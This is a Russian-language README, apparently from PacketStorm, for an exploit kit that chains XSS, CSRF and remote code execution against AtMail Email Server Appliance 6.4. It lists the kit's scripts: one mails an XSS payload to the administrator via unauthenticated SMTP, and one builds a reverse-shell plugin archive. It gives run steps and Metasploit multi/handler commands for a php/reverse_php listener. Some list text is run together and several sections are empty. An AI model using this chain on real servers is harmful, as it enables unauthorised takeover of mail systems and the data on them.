
AtMail Email Server Appliance 6.4 - Эксплойт-цепочка (XSS > CSRF > RCE)
[PacketStorm] [WLB-2020080010]
Дисклеймер: этот набор эксплойтов был вдохновлён EDB-ID 20009.
Цель этого набора эксплойтов — заменить EDB-ID 20009.
Плюсы этого набора по сравнению с эксплойтом EDB-ID 20009:
Минусы эксплойта EDB-ID 20009:
msfvenomУстановка требований в ArchLinux:
$ sudo pacman -S metasploit tar ruby
Файлы эксплойта:
config.yml содержит конфигурацию набораexploit.sh — обёртка эксплойта, которую нужно запуститьxss_mail.rb отправит email с XSS администратору через SMTP-сервер Atmail (без аутентификации)csrf_prepare.rb подготовит CSRF-пэйлоад (укажет цель и закодирует архив плагина)rce_prepare.rb подготовит RCE (сгенерирует реверс-шелл и создаст архив плагина)csrf_plugin.js — подготовленный CSRF-пэйлоадnoraj/, содержащая несжатую структуру плагинаНабор эксплойтов требует всего 2 ручных шага:
config.ymlexploit.shНо перед запуском атаки веб-сервер должен доставлять JavaScript CSRF-файл, а слушатель реверс-шелла должен ожидать подключения. Таким образом, атака будет больше похожа на:
config.ymlcsrf_plugin.jsexploit.shПример однострочного HTTP-сервера:
$ ruby -run -e httpd . -p 8000
Пример слушателя реверс-шелла:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/reverse_php
payload => php/reverse_php
msf5 exploit(multi/handler) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf5 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf5 exploit(multi/handler) > run